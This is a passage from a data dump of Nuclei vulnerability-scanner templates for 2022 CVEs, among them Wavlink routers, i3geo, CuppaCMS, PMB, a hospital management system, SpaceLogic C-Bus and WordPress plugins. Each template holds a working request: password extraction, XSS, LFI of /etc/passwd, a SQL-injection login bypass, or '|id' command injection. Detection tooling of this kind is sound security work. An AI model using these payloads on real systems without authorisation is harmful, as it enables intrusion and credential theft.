unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046\n - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34046\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34046\n cwe-id: CWE-863\n epss-score: 0.14292\n epss-percentile: 0.95577\n cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn533a8_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,packetstorm,wavlink,router,exposure\n\nhttp:\n - raw:\n - |\n GET /sysinit.shtml?r=52300 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'var syspasswd=\"'\n - 'APP'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'syspasswd=\"(.+?)\"'\n# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950", "hash": "63f5ab76985419954bd76dd2224ea40a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308552" }, "name": "CVE-2022-34047.yaml", "content": "id: CVE-2022-34047\n\ninfo:\n name: WAVLINK WN530HG4 - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047\n - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34047\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34047\n cwe-id: CWE-668\n epss-score: 0.14292\n epss-percentile: 0.95577\n cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530hg4_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,wavlink,router,exposure,packetstorm\n\nhttp:\n - raw:\n - |\n GET /set_safety.shtml?r=52300 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'var syspasswd=\"'\n - 'APP'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'syspasswd=\"(.+?)\"'\n# digest: 4b0a004830460221009d579af2f6d3d5044fff3d3ba8ae41ae23b08238a57030a5aca5ce2e072c848f02210096fb879980b385c7240a0b97b5ed0b21d8a2e4ab835977407c3e156daaece404:922c64590222798bb761d5b6d8e72950", "hash": "4f23a56245448568c357640aae31a349", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308553" }, "name": "CVE-2022-34048.yaml", "content": "id: CVE-2022-34048\n\ninfo:\n name: Wavlink WN-533A8 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50989\n - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing\n - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34048\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34048\n cwe-id: CWE-79\n epss-score: 0.00107\n epss-percentile: 0.43187\n cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn533a8_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve2022,cve,wavlink,xss,router,edb\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n\n newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'x\");alert(9);x=(\"?login=0\");'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220517ca1dce8d4d311ecbc72009be25a53b0ccf3bcc93670f195b5f037608dfef0022100e45d38b599b8695586de222b078c5ebb059c93246d3d687afc08bf6e5710226a:922c64590222798bb761d5b6d8e72950", "hash": "41fe7a304e73e13f4d1467a3004c9058", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308554" }, "name": "CVE-2022-34049.yaml", "content": "id: CVE-2022-34049\n\ninfo:\n name: WAVLINK WN530HG4 - Improper Access Control\n author: For3stCo1d\n severity: medium\n description: |\n Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049\n - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing\n - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34049\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-34049\n cwe-id: CWE-552\n epss-score: 0.17111\n epss-percentile: 0.95601\n cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530hg4_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,wavlink,router,exposure\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/ExportLogs.sh HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Login'\n - 'Password'\n condition: and\n\n - type: word\n part: header\n words:\n - filename=\"sysLogs.txt\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fe2b14acc7033ceb8f4865eea336e52f57abfcde0cdd377d01e8350e962bed1d0221008fcfa7a19d5076433d9771e4b486a3e7fe8ff8eb61a72aab3dd5a8320dcbd8d2:922c64590222798bb761d5b6d8e72950", "hash": "d1a77be5d7b7aaf38b3e859502f2ed09", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308555" }, "name": "CVE-2022-34093.yaml", "content": "id: CVE-2022-34093\n\ninfo:\n name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34093\n - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44\n - https://owasp.org/www-community/attacks/xss/\n - https://softwarepublico.gov.br/social/i3geo\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34093\n cwe-id: CWE-79\n epss-score: 0.00266\n epss-percentile: 0.65533\n cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: softwarepublico\n product: i3geo\n tags: cve,cve2022,i3geo,xss,softwarepublico\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")'\n condition: and\n# digest: 4a0a00473045022100b6c16f44954588e4bae35bb1d81fb7146230861817ce49f5a3de2f00e70a282a02204ac735c905d496f7e25c3534786304a13f57730db0a36a2c722fa4471bb64fa0:922c64590222798bb761d5b6d8e72950", "hash": "d6b3af524992f93891871d0a2b5c7f76", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308556" }, "name": "CVE-2022-34094.yaml", "content": "id: CVE-2022-34094\n\ninfo:\n name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.\n reference:\n - https://github.com/edmarmoretti/i3geo/issues/5\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34093\n - https://owasp.org/www-community/attacks/xss/\n - https://softwarepublico.gov.br/social/i3geo\n - https://github.com/wagnerdracha/ProofOfConcept\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34094\n cwe-id: CWE-79\n epss-score: 0.00266\n epss-percentile: 0.65533\n cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: softwarepublico\n product: i3geo\n tags: cve2022,cve,i3geo,xss,softwarepublico\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")'\n condition: and\n# digest: 4a0a00473045022100ae011287587c98e490b0c70b0c3ea88250a2b29a79c656693b056f3adbda9acd022035c0bf42383d419c05913b95afad80e3a7bf9eecc3689f24b92069aff39fc3af:922c64590222798bb761d5b6d8e72950", "hash": "1f48690c07e665875da59bd6caafc420", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308557" }, "name": "CVE-2022-34121.yaml", "content": "id: CVE-2022-34121\n\ninfo:\n name: CuppaCMS v1.0 - Local File Inclusion\n author: edoardottt\n severity: high\n description: |\n Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates\n - https://github.com/CuppaCMS/CuppaCMS/issues/18\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34121\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34121\n cwe-id: CWE-829\n epss-score: 0.66943\n epss-percentile: 0.97855\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,cms,cuppacms\n\nhttp:\n - raw:\n - |\n POST /templates/default/html/windows/right.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=../../../../../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c5726ce028ac359181e6ce2ccd45251d4715c1c9c936d2ef67b588f2159e7cc9022100c49a6fcb006b5de199ccc32a6d1716a713f8de4f24346ba4578c705b4f225245:922c64590222798bb761d5b6d8e72950", "hash": "dd5885333b38e613cc53b57577bd1b6f", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308558" }, "name": "CVE-2022-34328.yaml", "content": "id: CVE-2022-34328\n\ninfo:\n name: PMB 7.3.10 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of PMB.\n reference:\n - https://github.com/jenaye/PMB/blob/main/README.md\n - https://github.com/jenaye/PMB\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34328\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-34328\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36967\n cpe: cpe:2.3:a:sigb:pmb:7.3.10:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sigb\n product: pmb\n shodan-query: http.html:\"PMB Group\"\n tags: cve,cve2022,pmb,xss,pmb_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"' target='cart_info\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206bde39b421fc0dbe953ff2bb4c4414dd18a118d11c1854e21a49bfefa62df3f2022009445f47a0e787a6922487a2834e6903d60e5f80936db25397d553943d744fc0:922c64590222798bb761d5b6d8e72950", "hash": "ed55ffd301c6cfbb8f04ce480f6d5a34", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308559" }, "name": "CVE-2022-34576.yaml", "content": "id: CVE-2022-34576\n\ninfo:\n name: WAVLINK WN535 G3 - Improper Access Control\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34576\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/tr3ss/gofetch\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-34576\n epss-score: 0.03075\n epss-percentile: 0.90796\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Login='\n - 'Password='\n - 'Model='\n - 'AuthMode='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022008737e106e5c8fe1e9e117f6bc57f005c3fb3b9810552455947f1568b74df85a022016b0f75b1b14036e1e8e1ce246588f322c3dbd791bc9db34ffead55bef452f8d:922c64590222798bb761d5b6d8e72950", "hash": "57de1bde38436dd00af72bdab5390d56", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855a" }, "name": "CVE-2022-34590.yaml", "content": "id: CVE-2022-34590\n\ninfo:\n name: Hospital Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34590\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-34590\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.86269\n cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hospital_management_system_project\n product: hospital_management_system\n shodan-query: http.html:\"Hospital Management System\"\n tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project\n\nhttp:\n - raw:\n - |\n POST /hms/admin/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Admin | Dashboard'\n - 'Manage Patients'\n - 'Manage Doctors'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220508a25e53992f71a0c0e1613f1df75afea7314115bd57f3048e91c9fc36ddf3802207ce3526546e9caca6a5e12a9b26fc0687f38a8f928ff84e751c99d5677ba4114:922c64590222798bb761d5b6d8e72950", "hash": "28371998ab59b2c3ff57edd6c6650ff1", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855b" }, "name": "CVE-2022-34753.yaml", "content": "id: CVE-2022-34753\n\ninfo:\n name: SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution\n author: gy741\n severity: high\n description: |\n SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability.\n reference:\n - https://www.zeroscience.mk/codes/SpaceLogic.txt\n - https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf\n - http://packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34753\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-34753\n cwe-id: CWE-78\n epss-score: 0.96923\n epss-percentile: 0.99698\n cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: schneider-electric\n product: spacelogic_c-bus_home_controller_firmware\n shodan-query: html:\"SpaceLogic C-Bus\"\n tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric\n\nhttp:\n - raw:\n - |\n GET /delsnap.pl?name=|id HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - 'uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204b51d243c97f21fcb85beb1f317c06aee7975d29df11fb1cee0c2956fe0fd65b02204299ce2ca6106775b89d507ffec1d69bf0c776615de752889c3ebcc81abf06d2:922c64590222798bb761d5b6d8e72950", "hash": "b8fcea435496c47210456aad342e797b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855c" }, "name": "CVE-2022-3484.yaml", "content": "id: CVE-2022-3484\n\ninfo:\n name: WordPress WPB Show Core - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.\n remediation: |\n Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3484\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3484\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45981\n cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpb_show_core_project\n product: wpb_show_core\n framework: wordpress\n google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php\n tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"wpb_jplayer_setting\")'\n - 'contains(body, \"\")'\n condition: and\n# digest: 490a0046304402201a749cdffd411187ddb33010e8f5216620153b04b07fa73fc4fc631a83f40fb2022002510fd3818a0349b4e36bb35d207c52445a1777f8df6d4ef0baf5cb38af6080:922c64590222798bb761d5b6d8e72950", "hash": "b8fee392db83e22600136f624ab6fc23", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855d" }, "name": "CVE-2022-3506.yaml", "content": "id: CVE-2022-3506\n\ninfo:\n name: WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability.\n reference:\n - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/\n - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828\n - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3506\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-3506\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48543\n cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: never5\n product: related_posts\n framework: wordpress\n tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n - |\n GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(header_4, 'text/html')\"\n - \"status_code_4 == 200\"\n - 'contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")'\n - \"contains(body_4, 'The amount of automatically')\"\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-z]+)\" />'\n internal: true\n part: body\n# digest: 490a004630440220183c07929c3a6fa76dbd9ae9c9682952d3b03b59c1ff34cf40687d299cfb671b022070f05c9efb0883a2b4afd38a695f1868ab9b6e7d4d0a3356e1fc0e8be2a02643:922c64590222798bb761d5b6d8e72950", "hash": "70023d1b646a25ba18059d20a084a2f8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30855e" }, "name": "CVE-2022-35151.yaml", "content": "id: 